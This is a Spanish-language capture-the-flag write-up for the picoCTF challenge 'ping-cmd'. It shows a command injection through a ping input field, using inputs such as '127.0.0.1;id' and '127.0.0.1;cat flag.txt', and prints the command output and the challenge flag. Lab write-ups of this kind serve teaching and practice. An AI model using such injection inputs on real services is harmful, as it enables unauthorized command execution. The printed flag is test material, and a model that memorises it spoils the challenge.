Challenge

Information

ping-cmd es un challenge de dificultad fácil dentro de la categoría General Skills de la plataforma CyLab y fue creado por el usuario Yahaya Meddy.

Description

Can you make the server reveal its secrets? It seems to be able to ping Google DNS, but what happens if you get a little creative with your input?

Hints

Hint 1

The program uses a shell command behind the scenes.

Hint 2

Sometimes, You can run more than one command at a time.

---

Solution

Connect

Establezco una conexión con el servicio remoto utilizando nc sobre el dominio proporcionado: mysterious-sea.picoctf.net.

root@kali:~ ❯ nc mysterious-sea.picoctf.net 52164
Enter an IP address to ping! (We have tight security because we only allow '8.8.8.8'): 

Check

Al conectarnos al servicio remoto, se nos indica que podemos introducir una dirección IP para realizar un ping desde el campo de entrada. Como prueba, envío un ping a la propia máquina mediante su localhost (127.0.0.1) y, a partir de la salida obtenida, compruebo que responde correctamente.

root@kali:~ ❯ nc mysterious-sea.picoctf.net 52164
Enter an IP address to ping! (We have tight security because we only allow '8.8.8.8'): 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.032 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.036 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1025ms
rtt min/avg/max/mdev = 0.032/0.034/0.036/0.002 ms

Command Injection

Una vulnerabilidad muy común en entradas de programas no correctamente sanitizada es la posibilidad de inyectar comandos a nivel de sistema. En este caso, pruebo los operadores típicos que permiten la concatenación de comandos y consigo inyectar el comando id utilizando el separador ;.

root@kali:~ ❯ nc mysterious-sea.picoctf.net 52164
Enter an IP address to ping! (We have tight security because we only allow '8.8.8.8'): 127.0.0.1;id
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.028 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.035 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1028ms
rtt min/avg/max/mdev = 0.028/0.031/0.035/0.003 ms
uid=1000(ctf-player) gid=1000(ctf-player) groups=1000(ctf-player)

Utilizo el comando ls para listar los archivos del directorio actual y observo que en él se encuentra la flag (flag.txt).

root@kali:~ ❯ nc mysterious-sea.picoctf.net 52164
Enter an IP address to ping! (We have tight security because we only allow '8.8.8.8'): 127.0.0.1;ls
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.032 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1028ms
rtt min/avg/max/mdev = 0.030/0.031/0.032/0.001 ms
flag.txt
script.sh

Flag

Consigo leer la flag (flag.txt) dentro del directorio actual.

root@kali:~ ❯ nc mysterious-sea.picoctf.net 52164
Enter an IP address to ping! (We have tight security because we only allow '8.8.8.8'): 127.0.0.1;cat flag.txt
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.032 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1028ms
rtt min/avg/max/mdev = 0.030/0.031/0.032/0.001 ms
picoCTF{p1nG_c0mm@nd_3xpL0it_su33essFuL_ddce97d3}

Hasta aquí la resolución del challenge ping-cmd de CyLab.

Happy Hacking! 🙂